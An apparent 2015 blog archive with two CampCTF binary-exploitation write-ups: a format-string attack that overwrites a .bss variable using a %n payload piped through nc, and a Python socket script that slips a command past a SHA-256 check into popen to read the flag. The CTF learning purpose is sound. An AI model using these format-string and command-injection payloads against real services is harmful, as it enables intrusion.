Category Archives: CampCTF

Rakesh Paruchuri 8:36 am on September 4, 2015  

hacker_level 200 CAMPCTF – 2015

This is other exploit problem that i have solved with the help of my friend. This was very simple challenge of FORMAT STRING venerability. As source code was given it has became more easy to solve the challenge.
The venerability of this challenge lies in

        usleep(150000);
        printf("Hello, ");
        printf(name);

printf(name) that is next to printf(“Hello, “).
So the main goal of this challenge is to change the value of level to 0xCCC31337 using format string. Here the main problem is that the variable level is not on stack it is in .bss section. Seeing all this i remember solving same type of challenge in ‘Exploit-exercises’ which is Format:level3. So solving that challenge again i have solved this challenge.

Finally here is the exploit:

python -c 'print "\x4c\xa0\x04\x08"+ "\x4d\xa0\x04\x08"+ "\x4e\xa0\x04\x08" + "\x4f\xa0\x04\x08 "  + "%294u%7$n" + "%220u%8$n" + "%176u%9$n"+ "%265u%10$n"' | nc 144.76.92.167 10118

And flag of this challenge is : CAMP15_337deec05ccc63b1168ba3379ae4d65854132604

Rakesh Paruchuri 2:10 pm on August 16, 2015  

secret_file (150) CAMP CTF – 2015

This challenge is form camp-ctf 2015. This is the first time i have solved a real Binary Exploitation challenge. The given bianry is actually ELF 64-bit , dynamically linked and stripped. So i randomly gave large input and got segmentation fault at some point. So i though that must be some simple ROP and stared reversing it. I found some venerable functions like getline (Which doesn’t check the size of the input) and there was strcpy function called i was shocked “why the need of strcpy in the case you have getline”. So to check weather it is NX enabled or not, i used checksec for that.

RELRO           STACK CANARY      NX            PIE               RPATH         RUNPATH
Full RELRO    Canary found    NX enabled    PIE enabled     No RPATH   No RUNPATH

So i was shocked seeing FULL RELRO and Canary found for which you cannot use normal ROP. So thought there must something other than the overflowing part and started reversing it again. I found one “POPEN” function from which could spawn a shell. But to call that function you have to pass a “STRCMP” function. But the comparison was with some hash value.

Later I figured it out it was SHA_256 encryption and it encrypting was 256 bytes. But i didn’t knew which 256 bytes was those. After some brute force i found those were first 256 bytes of the input and was comparing form 284th byte of the input. i tried giving input same as that and that worked, I could call POPEN with the argument as, starting from 257th byte of the input. Later i tried giving “/bin/sh\x00” as argument but that didn’t work because there is STRRCHR function in the beginning which i didn’t notice. That function was actually searching for null byte. So that didn’t work and i wasted lot of time trying with other stuff. Later one of my senior gave me an idea, which was command injunction(;) which i tried reading flag and that worked… 🙂

And here is my exploit.


import struct
import socket

ip = "144.76.92.167"
port = 10105

soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
soc.connect((ip, port))

payload = ''
payload += "A" * 256
payload += "/bin/cat flag.txt;"
payload += "B" * 9
payload += "e075f2f51cad23d0537186cfcd50f911ea954f9c2e32a437f45327f1b7899bbb" #This is the SHA_256 of 256 A's

soc.send(payload + '\n')
print soc.recv(1050)